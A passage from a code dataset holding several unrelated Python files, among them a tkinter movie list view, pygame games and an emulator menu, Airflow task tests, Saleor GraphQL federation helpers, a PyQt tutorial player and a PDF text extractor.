self._scrollbar = tk.Scrollbar(self, orient=tk.VERTICAL)\n\n self._listbox = tk.Listbox(self, yscrollcommand=self._scrollbar.set)\n self._scrollbar.config(command=self._listbox.yview)\n self._listbox.grid(row=2, columnspan=5, ipadx=100, ipady=20)\n self._scrollbar.grid(row=2, column=6, sticky=tk.N+tk.S+tk.E)\n\n self._button1 = tk.Button(self,\n text=\"Refresh\",\n command=self._submit_callback)\n self._button1.grid(row=3, column=1, pady=5)\n\n self._button1 = tk.Button(self,\n text=\"Update\",\n command=self._update_callback)\n self._button1.grid(row=3, column=2, pady=5)\n\n self._button1 = tk.Button(self,\n text=\"Delete\",\n command=self._delete_callback)\n self._button1.grid(row=3, column=3, pady=5)\n\n self._button1 = tk.Button(self,\n text=\"Details\",\n command=self._detail_callback)\n self._button1.grid(row=3, column=4, pady=5)\n\n def set_form_data(self, data):\n self._listbox.delete(0, tk.END)\n if data is None:\n self._listbox.insert(tk.END, \"\")\n return\n for m in data:\n self._listbox.insert(tk.END, \"{}--{}\".format(m[\"name\"], m[\"id\"]))\n\n def get_id(self):\n if len(self._listbox.curselection()) != 0:\n index = self._listbox.curselection()[0]\n id = int(self._listbox.get(0, tk.END)[index].split(\"--\")[1])\n return str(id)\n\n else:\n tkMessageBox.showerror(\"Error\", \"No item is selected.\")\n raise ValueError\n\n def delete_id(self, id):\n index = self._listbox.curselection()[0]\n name = str(self._listbox.get(0, tk.END)[index].split(\"--\")[0])\n if tkMessageBox.askyesno('Verify', 'Delete ' + name + \"?\"):\n return id\n\n def get_detail(self, ent):\n tkMessageBox.showinfo(\"Details\", \"Name: {}\\nYear Released: {}\\nDirector: {}\\nRating: {}\\nLength: {}\"\n .format(ent['name'], ent['year_released'], ent['director'], ent['rating'], ent['length']))\n\n def get_selected(self, data):\n if self.get_id() is not None:\n for m in data:\n if m[\"id\"] == int(self.get_id()):\n return m\n\n\n\n","sub_path":"page1_view.py","file_name":"page1_view.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"607990422","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\nimport re\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef plot_num_per_reporter(df):\n reporter = pd.DataFrame(df.loc[:, ['issuekey', 'reporter']])\n reporter = reporter.groupby('reporter').count()\n reporter = reporter[reporter.issuekey > 10]\n print(reporter)\n bar = reporter.plot(kind='bar', title='Num per Reporter')\n \n plt.xticks(np.arange(len(reporter)), reporter.index, rotation=90)\n for p in bar.patches:\n bar.annotate(str(p.get_height()), xy=(p.get_x(), p.get_height()+2))\n\ndef plot_num_per_release(df):\n fixVersions = pd.DataFrame(df.loc[:, ['issuekey', 'fixVersions']])\n for i, r in fixVersions.iterrows():\n s = str(fixVersions.get_value(i, 'fixVersions'))\n fixVersions.set_value(i, 'fixVersions', re.sub(r'((\\d[.]\\d)+(SP1)?)(.*)', '\\g<1>', re.sub(r'\\s', '', s)))\n fixVersions = fixVersions.groupby('fixVersions').count()\n bar = fixVersions.plot(kind='bar', title='Num per Release')\n \n plt.xticks(np.arange(len(fixVersions)), fixVersions.index, rotation=60)\n for p in bar.patches:\n bar.annotate(str(p.get_height()), xy=(p.get_x(), p.get_height()+2))\n\n\n\ndf = pd.read_csv('allResolvedIssues.txt', '@')\nplot_num_per_release(df)\nplot_num_per_reporter(df)\nplt.show()\n","sub_path":"jira_plot.py","file_name":"jira_plot.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"327426059","text":"#!/usr/bin/python3\n\nimport sys\nimport pygame\nfrom pygame.locals import *\nimport subprocess\nimport os\nfrom scroll_menu import Menu\nimport pygame.mixer\nfrom conf import Config\nfrom player import Player\nfrom reset_button_handler import GPIOButtonHandler\nimport copy\n\nglobal current_proc\nglobal is_only_one_game\n\nif not pygame.font.get_init():\n pygame.font.init()\n \ndef exit(menu):\n menu.destroy()\n pygame.display.quit()\n sys.exit()\n \ndef return_to_menu():\n global current_proc\n if current_proc != None:\n current_proc.kill()\n\ndef start_game_if_alone(conf):\n global current_proc\n global is_only_one_game\n files = 0\n filepath = \"\"\n emulator_command = []\n for dirname, dirnames, filenames in os.walk(conf.get_conf_for_label('root')['dir']):\n # print path to all filenames.\n conf_for_dir = conf.get_conf_for_dir(dirname)\n rom_suffixes = conf_for_dir['rom_suffixes']\n emulator_command = copy.deepcopy(conf_for_dir['emulator_command'])\n for filename in filenames:\n if filename[filename.rfind('.'):].lower() in rom_suffixes or len(rom_suffixes) == 0:\n files += 1\n filepath = os.path.join(dirname, filename)\n for i in range(len(emulator_command)):\n if emulator_command[i].find('%ROM%') == -1:\n continue\n emulator_command[i] = emulator_command[i].replace('%ROM%', filepath)\n if files == 1:\n is_only_one_game = True\n current_proc = subprocess.Popen(emulator_command)\n current_proc.wait()\n else:\n is_only_one_game = False\n\n\nif __name__ == \"__main__\":\n global current_proc\n global is_only_one_game\n current_proc = None\n reset_handler = GPIOButtonHandler(return_to_menu, 13)\n reset_handler.start()\n \n conf = Config()\n \n is_only_one_game = True\n while is_only_one_game:\n start_game_if_alone(conf)\n \n player = Player()\n screen = pygame.display.set_mode((0,0), pygame.FULLSCREEN) #0,6671875 and 0,(6) of HD resoultion\n \n menu = Menu(conf, player)\n menu.set_dir(conf.get_conf_for_label('root')['dir'])\n menu.render(screen, full_update = True)\n \n pygame.joystick.init()\n joystick = pygame.joystick.Joystick(0)\n joystick.init()\n pygame.key.set_repeat(199,69)#(delay,interval)\n while 1:\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n # What action should we do?\n if event.key == K_UP:\n menu.move_selection(-1)\n menu.render(screen)\n if event.key == K_DOWN:\n menu.move_selection(1)\n menu.render(screen)\n if event.key == K_RETURN:\n #menu = \n selected_menu_item = menu.menu_items[menu.selected_menu_item]\n if selected_menu_item.action.action_type == 'navigate':\n menu.set_dir(menu.menu_items[menu.selected_menu_item].action.action)\n menu.render(screen, full_update = True)\n elif selected_menu_item.action.action_type == 'execute':\n player.pause()\n pygame.display.quit()\n current_proc = subprocess.Popen(selected_menu_item.action.action)\n current_proc.wait()\n player.resume()\n pygame.display.init()\n pygame.mouse.set_visible(False)\n screen = pygame.display.set_mode((0,0), pygame.FULLSCREEN) #0,6671875 and 0,(6) of HD resoultion\n menu.render(screen, full_update = True)\n if event.key == K_ESCAPE:\n exit(menu)\n elif event.type == QUIT:\n exit(menu)\n\t\n\t#### JOYPAD CONFIGURATION ####\n axis0 = round(joystick.get_axis(0))\n axis1 = round(joystick.get_axis(1))\n if axis1 == -1:\n menu.move_selection(-1)\n menu.render(screen)\n if axis1 == 1:\n menu.move_selection(1)\n menu.render(screen)\n if axis0 == -1:\n menu.move_selection(-3)\n menu.render(screen) \n if axis0 == 1:\n menu.move_selection(3)\n menu.render(screen) \n #menu = \n if joystick.get_button( 0 ) == 1:\n selected_menu_item = menu.menu_items[menu.selected_menu_item]\n if selected_menu_item.action.action_type == 'navigate':\n menu.set_dir(menu.menu_items[menu.selected_menu_item].action.action)\n menu.render(screen, full_update = True)\n elif selected_menu_item.action.action_type == 'execute':\n player.pause()\n pygame.display.quit()\n current_proc = subprocess.Popen(selected_menu_item.action.action)\n current_proc.wait()\n current_proc = None\n player.resume()\n pygame.display.init()\n pygame.mouse.set_visible(False)\n screen = pygame.display.set_mode((0,0), pygame.FULLSCREEN) #0,6671875 and 0,(6) of HD resoultion\n menu.render(screen, full_update = True)\n if joystick.get_button( 1 ) == 1:\n menu.set_dir(menu.back_action.action)\n menu.render(screen, full_update = True)\n pygame.time.wait(8)\n \n","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":5493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"557031721","text":"import pygame\r\nimport sys\r\nfrom pygame.draw import *\r\nfrom random import randint\r\npygame.init()\r\n\r\nprint('Hello! Please enter your name:')\r\nname = input()\r\n\r\nFPS = 20\r\nscreen = pygame.display.set_mode((1200, 800))\r\n\r\nRED = (255, 0, 0)\r\nBLUE = (0, 0, 255)\r\nYELLOW = (255, 255, 0)\r\nGREEN = (0, 255, 0)\r\nMAGENTA = (255, 0, 255)\r\nCYAN = (0, 255, 255)\r\nBLACK = (0, 0, 0)\r\nCOLORS = [RED, BLUE, YELLOW, GREEN, MAGENTA, CYAN]\r\n\r\nrect(screen, (255, 255, 255), (50, 50, 1100, 700))\r\n\r\nscore = 0\r\ncheck = [6, 6]\r\nx = [0, 0]\r\ny = [0, 0]\r\nr = [0, 0]\r\nvx = [0, 0]\r\nvy = [0, 0]\r\ncolor = [RED, RED]\r\nmaxtime = [10, 10]\r\n\r\n\r\ndef new_ball(a): \r\n '''Create a ball \r\n x, y coordinates of a ball\r\n r - radius of a ball\r\n vx, vy - speed of a ball\r\n color - colour of a ball\r\n maxtime - lifetime of a ball'''\r\n global x, y, r, vx, vy, color, maxtime\r\n x[a] = randint(150, 1050)\r\n y[a] = randint(150, 650)\r\n r[a] = randint(10, 100)\r\n vx[a] = randint(-15, 15) \r\n vy[a] = randint(-15, 15) \r\n color[a] = COLORS[randint(0, 5)]\r\n maxtime[a] = randint(10, 50)\r\n circle(screen, color[a], (x[a], y[a]), r[a])\r\n \r\ndef move_ball(a):\r\n global x, y, r, color, vx, vy, maxtime\r\n if x[a] <= 50 + r[a] or x[a] >= 1150 - r[a]:\r\n vx[a] = -vx[a]\r\n if y[a] <= 50 + r[a] or y[a] >= 750 - r[a]:\r\n vy[a] = -vy[a]\r\n x[a] = x[a] + vx[a]\r\n y[a] = y[a] + vy[a]\r\n circle(screen, color[a], (x[a], y[a]), r[a])\r\n \r\nx2 = [0, 0]\r\ny2 = [0, 0]\r\nr2 = [0, 0]\r\nvx2 = [0, 0]\r\nvy2 = [0, 0]\r\ncolor2 = [RED, RED]\r\nmaxtime2 = [10, 10]\r\ncurent_time = [0, 0]\r\ntime_of_motion = [5, 5]\r\ncheck2 = [6, 6]\r\ntime = [0, 0]\r\ncurrent_time_of_game = 0\r\nt = 0\r\n \r\ndef new_square(a): \r\n '''Create a square\r\n x2, y2 - coordinates of a square\r\n r2 - half of lenth of side of square\r\n vx2, vy2 - speed of a square\r\n color2 - colour of a square\r\n maxtime2 - lifetime of a square'''\r\n global x2, y2, r2, vx2, vy2, color2, maxtime2\r\n x2[a] = randint(150, 1050)\r\n y2[a] = randint(150, 650)\r\n r2[a] = randint(20, 40)\r\n vx2[a] = randint(-10, 10) \r\n vy2[a] = randint(-10, 10) \r\n color2[a] = COLORS[randint(0, 5)]\r\n maxtime2[a] = randint(10, 50)\r\n time_of_motion[a] = randint(5, 10)\r\n curent_time[a] = 0\r\n rect(screen, color2[a], (x2[a], y2[a], r2[a] * 2, r2[a] * 2))\r\n \r\n\r\ndef move_square(a):\r\n global x2, y2, r2, color2, vx2, vy2, maxtime2\r\n if curent_time[a] >= time_of_motion[a]:\r\n time_of_motion[a] = randint(5, 10)\r\n vx2[a] = randint(-15, 15)\r\n vy2[a] = randint(-15, 15)\r\n curent_time[a] = 0\r\n else:\r\n curent_time[a] = curent_time[a] + 1\r\n if x2[a] <= 50 or x2[a] >= 1150 - 2 * r2[a]:\r\n vx2[a] = -vx2[a]\r\n if y2[a] <= 50 or y2[a] >= 750 - 2 * r2[a]:\r\n vy2[a] = -vy2[a]\r\n \r\n x2[a] = x2[a] + vx2[a]\r\n y2[a] = y2[a] + vy2[a]\r\n rect(screen, color2[a], (x2[a], y2[a], 2 * r2[a], 2 * r2[a]))\r\n\r\n\r\ndef board(name, score):\r\n with open('C:/Task1/homework/WORK_6/score.txt', 'r') as board:\r\n old_board = board.read().split()\r\n lenth = len(old_board) // 2\r\n name_of_player = [0 for i in range(lenth)]\r\n score_of_player = [0 for i in range(lenth)]\r\n k = -1\r\n for i in range(lenth):\r\n name_of_player[i] = old_board[i * 2]\r\n if name_of_player[i] == name:\r\n k = i\r\n score_of_player[i] = int(old_board[i * 2 + 1])\r\n flag = True\r\n if k < 0: #if this is a new player\r\n name_of_player.append(name)\r\n score_of_player.append(score)\r\n i = 0\r\n while score > score_of_player[lenth - 1 - i] and i != lenth:\r\n score_of_player[lenth - i] = score_of_player[lenth - 1 - i]\r\n name_of_player[lenth - i] = name_of_player[lenth - 1 - i]\r\n name_of_player[lenth - 1 - i] = name\r\n score_of_player[lenth - 1 - i] = score\r\n i = i + 1\r\n new_board = ''\r\n for i in range(lenth + 1):\r\n new_board = new_board + str(name_of_player[i]) + ' ' + str(score_of_player[i]) + '\\n' \r\n else:\r\n if score > score_of_player[k]:\r\n score_of_player[k] = score\r\n while score > score_of_player[k - 1] and k != 0:\r\n score_of_player[k] = score_of_player[k - 1]\r\n name_of_player[k] = name_of_player[k - 1]\r\n score_of_player[k - 1] = score\r\n name_of_player[k - 1] = name\r\n k = k - 1\r\n new_board = ''\r\n for i in range(lenth):\r\n new_board = new_board + str(name_of_player[i]) + ' ' + str(score_of_player[i]) + '\\n' \r\n with open('C:/Task1/homework/WORK_6/score.txt', 'w') as board:\r\n board.write(new_board)\r\n \r\n \r\ndef text(s, f, x, y):\r\n f1 = pygame.font.Font(None, f)\r\n text1 = f1.render(s, True, (225, 225, 225))\r\n screen.blit(text1, (x, y))\r\n \r\n\r\npygame.display.update()\r\nclock = pygame.time.Clock()\r\nfinished = False\r\n\r\nwhile not finished:\r\n clock.tick(FPS)\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n finished = True\r\n print('Your score: ',score)\r\n board(name, score)\r\n print('Board of leaders:')\r\n with open('C:/Task1/homework/WORK_6/score.txt', 'r') as board:\r\n print(board.read())\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n for i in range(2):\r\n d2 = (event.pos[0] - x[i]) ** 2 + (event.pos[1] - y[i]) ** 2\r\n if d2 <= r[i] ** 2:\r\n score = score + 1\r\n new_ball(i)\r\n for i in range(2):\r\n if abs(event.pos[0] - r2[i] - x2[i]) <= r2[i] and abs(event.pos[1] - r2[i] - y2[i]) <= r2[i]:\r\n score = score + 2\r\n new_square(i)\r\n for i in range(2):\r\n if check[i] <= maxtime[i]:\r\n move_ball(i)\r\n check[i] = check[i] + 1\r\n else:\r\n new_ball(i)\r\n check[i] = 0\r\n for i in range(2):\r\n if check2[i] <= maxtime2[i]:\r\n move_square(i)\r\n check2[i] = check2[i] + 1\r\n else:\r\n new_square(i)\r\n check2[i] = 0\r\n pygame.display.update()\r\n screen.fill(BLACK)\r\n rect(screen, (255, 255, 255), (50, 50, 1100, 700))\r\n rect(screen, (0, 0, 0), (51, 51, 1098, 698))\r\n text('Score:' + str(score), 20, 10, 10)\r\n t = t + 1 #time\r\n if t % 2 == 0:\r\n current_time_of_game = current_time_of_game + 0.1\r\n text('Time:' + str(30 - round(current_time_of_game)), 20, 100, 10)\r\n if current_time_of_game // 1 == 30:\r\n finished = True\r\n print('Your score:', score)\r\n print('Board of leaders:')\r\n board(name, score)\r\n with open('C:/Task1/homework/WORK_6/score.txt', 'r') as board:\r\n print(board.read())\r\n\r\npygame.quit()\r\n\r\nwait = input()","sub_path":"LAB_6/balls+score.py","file_name":"balls+score.py","file_ext":"py","file_size_in_byte":6878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"429423415","text":"import os\nimport subprocess\nimport tempfile\n\nimport pytest\n\nfrom prefect import Flow, Task, task, triggers\nfrom prefect.tasks.airflow import AirflowTask, AirflowTriggerDAG\nfrom prefect.tasks.shell import ShellTask\n\npytestmark = pytest.mark.airflow\n\n\n@pytest.fixture(scope=\"module\")\ndef airflow_settings():\n with tempfile.NamedTemporaryFile(\n prefix=\"prefect-airflow\", suffix=\"prefect-airflow-test.db\"\n ) as tmp:\n env = os.environ.copy()\n env[\"AIRFLOW__CORE__SQL_ALCHEMY_CONN\"] = \"sqlite:///\" + tmp.name\n env[\"db_conn\"] = tmp.name\n dag_folder = os.path.join(os.path.dirname(__file__), \"dags\")\n env[\"AIRFLOW__CORE__DAGS_FOLDER\"] = dag_folder\n status = subprocess.check_output(\n [\n \"bash\",\n \"-c\",\n \"source deactivate && source activate airflow && airflow initdb\",\n ],\n env=env,\n )\n yield {\n k: v for k, v in env.items() if k.startswith(\"AIRFLOW\") or k == \"db_conn\"\n }\n\n\nclass TestTaskStructure:\n def test_init_requires_task_and_dag_id(self):\n with pytest.raises(TypeError):\n task = AirflowTask()\n\n with pytest.raises(TypeError):\n task = AirflowTask(task_id=\"task name\")\n\n with pytest.raises(TypeError):\n task = AirflowTask(dag_id=\"dag name\")\n\n def test_name_defaults_to_task_id_but_can_be_changed(self):\n t1 = AirflowTask(task_id=\"test-task\", dag_id=\"blob\")\n assert t1.name == \"test-task\"\n\n t2 = AirflowTask(task_id=\"test-task\", dag_id=\"blob\", name=\"unique\")\n assert t2.name == \"unique\"\n\n def test_command_responds_to_env_name(self):\n t1 = AirflowTask(task_id=\"test-task\", dag_id=\"blob\")\n assert t1.helper_script == \"source deactivate && source activate airflow\"\n\n t2 = AirflowTask(\n task_id=\"test-task\", dag_id=\"blob\", airflow_env=\"airflow_conda_env\"\n )\n assert (\n t2.helper_script == \"source deactivate && source activate airflow_conda_env\"\n )\n\n def test_command_responds_to_cli_flags(self):\n t1 = AirflowTask(task_id=\"test-task\", dag_id=\"blob\", cli_flags=[\"--force\"])\n assert t1.command.startswith(\"airflow run --force\")\n\n\nclass TestSingleTaskRuns:\n def test_airflow_task_successfully_runs_a_task(self, airflow_settings):\n task = AirflowTask(\n db_conn=airflow_settings[\"db_conn\"],\n task_id=\"also_run_this\",\n dag_id=\"example_bash_operator\",\n env=airflow_settings,\n )\n\n flow = Flow(name=\"test single task\", tasks=[task])\n flow_state = flow.run()\n\n assert flow_state.is_successful()\n assert flow_state.result[task].is_successful()\n assert flow_state.result[task].result is None\n\n def test_airflow_task_uses_its_own_trigger_rules_by_default(self, airflow_settings):\n task = AirflowTask(\n db_conn=airflow_settings[\"db_conn\"],\n task_id=\"run_this_last\",\n dag_id=\"example_bash_operator\",\n env=airflow_settings,\n )\n\n with Flow(name=\"test single task\") as flow:\n res = task(execution_date=\"2011-01-01\")\n flow_state = flow.run()\n\n assert flow_state.is_successful()\n assert flow_state.result[res].is_skipped()\n\n def test_airflow_task_uses_cli_flags(self, airflow_settings):\n task = AirflowTask(\n db_conn=airflow_settings[\"db_conn\"],\n task_id=\"run_this_last\",\n dag_id=\"example_bash_operator\",\n cli_flags=[\"-A\"],\n env=airflow_settings,\n )\n\n with Flow(name=\"test single task\") as flow:\n res = task(execution_date=\"2011-01-02\")\n flow_state = flow.run()\n\n assert flow_state.is_successful()\n assert flow_state.result[res].is_successful()\n assert not flow_state.result[res].is_skipped()\n assert flow_state.result[res].result is None\n\n def test_airflow_task_checks_db_state_prior_to_execution(self, airflow_settings):\n pass\n\n def test_airflow_task_converts_xcoms_to_return_values(self, airflow_settings):\n puller = AirflowTask(\n db_conn=airflow_settings[\"db_conn\"],\n task_id=\"puller\",\n dag_id=\"example_xcom\",\n env=airflow_settings,\n execution_date=\"1999-09-20\",\n )\n push = AirflowTask(\n db_conn=airflow_settings[\"db_conn\"],\n task_id=\"push\",\n dag_id=\"example_xcom\",\n env=airflow_settings,\n execution_date=\"1999-09-20\",\n )\n push_by_returning = AirflowTask(\n db_conn=airflow_settings[\"db_conn\"],\n task_id=\"push_by_returning\",\n dag_id=\"example_xcom\",\n env=airflow_settings,\n execution_date=\"1999-09-20\",\n )\n\n with Flow(name=\"xcom\") as flow:\n res = puller(upstream_tasks=[push, push_by_returning])\n\n flow_state = flow.run()\n assert flow_state.is_successful()\n\n # puller\n assert flow_state.result[res].is_successful()\n assert flow_state.result[res].result is None\n\n # push\n assert flow_state.result[push].is_successful()\n assert flow_state.result[push].result == [1, 2, 3]\n\n # push_by_returning\n assert flow_state.result[push_by_returning].is_successful()\n assert flow_state.result[push_by_returning].result == {\"a\": \"b\"}\n\n\nclass TestTriggerDAG:\n def test_basic_trigger_dag_triggers(self, airflow_settings):\n task = AirflowTriggerDAG(\n dag_id=\"tutorial\", execution_date=\"1986-09-20\", env=airflow_settings\n )\n check_task = ShellTask(\n command=\"airflow list_dag_runs tutorial\",\n helper_script=task.helper_script,\n env=airflow_settings,\n )\n\n with Flow(name=\"tutorial\") as flow:\n res = check_task(upstream_tasks=[task])\n\n flow_state = flow.run()\n assert flow_state.is_successful()\n\n check_state = flow_state.result[res]\n assert check_state.is_successful()\n\n # check CLI output\n assert \"manual__1986-09-20T00:00:00+00:00\" in check_state.result\n assert \"running\" in check_state.result\n assert \"1986-09-20T00:00:00+00:00\" in check_state.result\n","sub_path":"tests/tasks/airflow/test_airflow.py","file_name":"test_airflow.py","file_ext":"py","file_size_in_byte":6333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"461126251","text":"from collections import defaultdict\n\nfrom django.conf import settings\nfrom graphene.utils.str_converters import to_snake_case\nfrom graphene_federation import build_schema\nfrom graphene_federation.entity import custom_entities\nfrom graphql import GraphQLError\n\nfrom ..channel import ChannelContext\nfrom .utils import from_global_id_or_error\n\n\ndef build_federated_schema(query=None, mutation=None, **kwargs):\n schema = build_schema(query, mutation, **kwargs)\n set_entity_resolver(schema)\n set_entity_type_resolver(schema)\n return schema\n\n\ndef set_entity_resolver(schema):\n \"\"\"Set type resolver aware of ChannelContext on _Entity union.\"\"\"\n entity = schema.get_type(\"Query\")\n entity.fields[\"_entities\"].resolver = resolve_entities\n\n\ndef resolve_entities(parent, info, representations):\n max_representations = settings.FEDERATED_QUERY_MAX_ENTITIES\n if max_representations and len(representations) > max_representations:\n representations_count = len(representations)\n raise GraphQLError(\n f\"Federated query exceeded entity limit: {representations_count} \"\n f\"items requested over {max_representations}.\"\n )\n\n resolvers = {}\n for representation in representations:\n if representation[\"__typename\"] not in resolvers:\n try:\n model = custom_entities[representation[\"__typename\"]]\n resolvers[representation[\"__typename\"]] = getattr(\n model, \"_%s__resolve_references\" % representation[\"__typename\"]\n )\n except AttributeError:\n pass\n\n batches = defaultdict(list)\n for representation in representations:\n model = custom_entities[representation[\"__typename\"]]\n model_arguments = representation.copy()\n typename = model_arguments.pop(\"__typename\")\n model_arguments = {to_snake_case(k): v for k, v in model_arguments.items()}\n model_instance = model(**model_arguments)\n batches[typename].append(model_instance)\n\n entities = []\n for typename, batch in batches.items():\n if typename not in resolvers:\n continue\n\n resolver = resolvers[typename]\n entities.extend(resolver(batch, info))\n\n return entities\n\n\ndef set_entity_type_resolver(schema):\n \"\"\"Set type resolver aware of ChannelContext on _Entity union.\"\"\"\n entity = schema.get_type(\"_Entity\")\n\n def resolve_entity_type(instance, info):\n # Use new strategy to resolve GraphQL Type for `ObjectType`\n if isinstance(instance, ChannelContext):\n model = type(instance.node)\n else:\n model = type(instance)\n\n model_type = schema.get_type(model._meta.object_name)\n if model_type is None:\n raise ValueError(\n f\"GraphQL type for model {model} could not be found. \"\n \"This is caused by federated type missing get_model method.\"\n )\n\n return model_type\n\n entity.resolve_type = resolve_entity_type\n\n\ndef resolve_federation_references(graphql_type, roots, queryset):\n ids = [\n from_global_id_or_error(root.id, graphql_type, raise_error=True)[1]\n for root in roots\n ]\n objects = {str(obj.id): obj for obj in queryset.filter(id__in=ids)}\n return [objects.get(root_id) for root_id in ids]\n","sub_path":"saleor/graphql/core/federation.py","file_name":"federation.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"494396579","text":"# -*- coding: cp1252 -*-\n\nimport sys\nimport os\nfrom player import Player\nfrom PyQt4 import QtGui, QtCore, Qt\n\ntry:\n _fromUtf8 = QtCore.QString.fromUtf8\nexcept AttributeError:\n def _fromUtf8(s):\n return s\n\nclass TelaAjudaTutoriais(QtGui.QMainWindow):\n def __init__(self):\n super(TelaAjudaTutoriais, self).__init__()\n cursor = QtGui.QCursor(QtGui.QPixmap('icons\\\\pointingHand.png'))\n ###########################################################\n\n self.setObjectName(_fromUtf8(\"self\"))\n self.resize(633, 611)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(_fromUtf8(\"icons\\\\logo lepe.png\")), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.setWindowIcon(icon)\n self.setStyleSheet(_fromUtf8(\"background-image: url(:ajuda.jpg);\\n\"\n\"\"))\n self.centralwidget = QtGui.QWidget(self)\n self.centralwidget.setObjectName(_fromUtf8(\"centralwidget\"))\n\n self.voltarBt = QtGui.QPushButton(self.centralwidget)\n self.voltarBt.setGeometry(QtCore.QRect(520, 560, 75, 23))\n self.voltarBt.setObjectName(_fromUtf8(\"voltarBt\"))\n self.voltarBt.setCursor(cursor)\n\n self.tutorialWidget = QtGui.QWidget(self.centralwidget)\n self.tutorialWidget.setGeometry(QtCore.QRect(40, 30, 553, 376))\n self.tutorialWidget.setStyleSheet(_fromUtf8(\"background-color: rgb(63, 63, 63);\"))\n \n self.tutorialWidget.setObjectName(_fromUtf8(\"tutorialWidget\"))\n\n self.tutorial1Bt = QtGui.QPushButton(self.centralwidget)\n self.tutorial1Bt.setGeometry(QtCore.QRect(40, 440, 181, 71))\n self.tutorial1Bt.setCursor(cursor)\n\n font = QtGui.QFont()\n font.setPointSize(14)\n\n self.tutorial1Bt.setFont(font)\n\n icon1 = QtGui.QIcon()\n icon1.addPixmap(QtGui.QPixmap(_fromUtf8(\"icons\\\\arrow.png\")), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n\n self.tutorial1Bt.setIcon(icon1)\n self.tutorial1Bt.setObjectName(_fromUtf8(\"tutorial1Bt\"))\n self.tutorial2Bt = QtGui.QPushButton(self.centralwidget)\n self.tutorial2Bt.setGeometry(QtCore.QRect(420, 440, 181, 71))\n self.tutorial2Bt.setCursor(cursor)\n\n font = QtGui.QFont()\n font.setPointSize(14)\n\n self.tutorial2Bt.setFont(font)\n self.tutorial2Bt.setIcon(icon1)\n self.tutorial2Bt.setObjectName(_fromUtf8(\"tutorial2Bt\"))\n self.tutorial3Bt = QtGui.QPushButton(self.centralwidget)\n self.tutorial3Bt.setGeometry(QtCore.QRect(230, 440, 181, 71))\n self.tutorial3Bt.setCursor(cursor)\n \n font = QtGui.QFont()\n font.setPointSize(14)\n\n self.tutorial3Bt.setFont(font)\n self.tutorial3Bt.setIcon(icon1)\n self.tutorial3Bt.setObjectName(_fromUtf8(\"tutorial3Bt\"))\n self.setCentralWidget(self.centralwidget)\n\n self.statusbar = QtGui.QStatusBar(self)\n self.statusbar.setObjectName(_fromUtf8(\"statusbar\"))\n self.setStatusBar(self.statusbar)\n\n self.setWindowTitle(\"Ajuda - Tutoriais\")\n self.voltarBt.setText(\"Voltar\")\n self.tutorial1Bt.setText(\"Escolhendo\\num nível\")\n self.tutorial2Bt.setText(\"Avaliação\\nQuantitativa\")\n self.tutorial3Bt.setText(\"Avaliação\\nQualitativa\")\n\n \n ###########################################################\n \n self.__player1 = Player(self.tutorialWidget)\n\n palette\t= QtGui.QPalette()\n self.setAutoFillBackground(True)\n img = QtGui.QPixmap(\"background\\\\ajuda.jpg\")\n img = img.scaled(QtCore.QSize(self.width(), self.height()))\n palette.setBrush(palette.Background, QtGui.QBrush(img))\n self.setPalette(palette)\n\n self.setMaximumHeight(self.height())\n self.setMaximumWidth(self.width())\n self.setMinimumHeight(self.height())\n self.setMinimumWidth(self.width())\n self.show()\n\n self.__player1.carregar(\"niveis\\\\nivel 1\\\\conts\\\\Cores\\\\video\\\\1- CORES ok.avi\")\n self.tutorial1Bt.clicked.connect(self.mostrarTutorial1)\n self.tutorial2Bt.clicked.connect(self.mostrarTutorial2)\n self.tutorial3Bt.clicked.connect(self.mostrarTutorial3)\n \n self.voltarBt.clicked.connect(self.voltar)\n\n def mostrarTutorial1(self):\n self.__player1.carregar(\"ajuda\\\\tutorial1.avi\")\n\n def mostrarTutorial2(self):\n self.__player1.carregar(\"ajuda\\\\tutorial2.avi\") \n\n def mostrarTutorial3(self):\n self.__player1.carregar(\"ajuda\\\\tutorial3.avi\") \n \n def voltar(self,e):\n #self.a = ajudaMenuInicial.TelaAjuda()\n #self.a.show()\n self.close()\n\n \ndef main():\n app = QtGui.QApplication(sys.argv)\n window = TelaAjudaTutoriais()\n app.exec_()\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"src/ajudaTutoriais.py","file_name":"ajudaTutoriais.py","file_ext":"py","file_size_in_byte":4751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"67101529","text":"#!/usr/bin/python3\n#Script to parse local pizza menu\n#import pypdf\nimport PyPDF2\n\ndef extract_information(pdf_path):\n with open(pdf_path, 'rb') as f:\n read_pdf = PyPDF2.PdfFileReader(pdf_path)\n number_of_pages = read_pdf.getNumPages()\n\n for page_number in range(number_of_pages):\n page = read_pdf.getPage(page_number)\n page_content = page.extractText()\n print(page_content)\n\nif __name__ == '__main__':\n path = '/PATH/TO/FILE.pdf'\n extract_information(path)\n","sub_path":"Scripts/menuparse.py","file_name":"menuparse.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"178845302","text":"# snapchat google microsoft\n'''\nDesign and implement a data structure for Least Recently Used (LRU) cache. It should support the following operations: get and put.\n\nget(key) - Get the value (will always be positive) of the key if the key exists in the cache, otherwise return -1.\nput(key, value) - Set or insert the value if the key is not already present. When the cache reached its capacity, it should invalidate the least recently used item before inserting a new 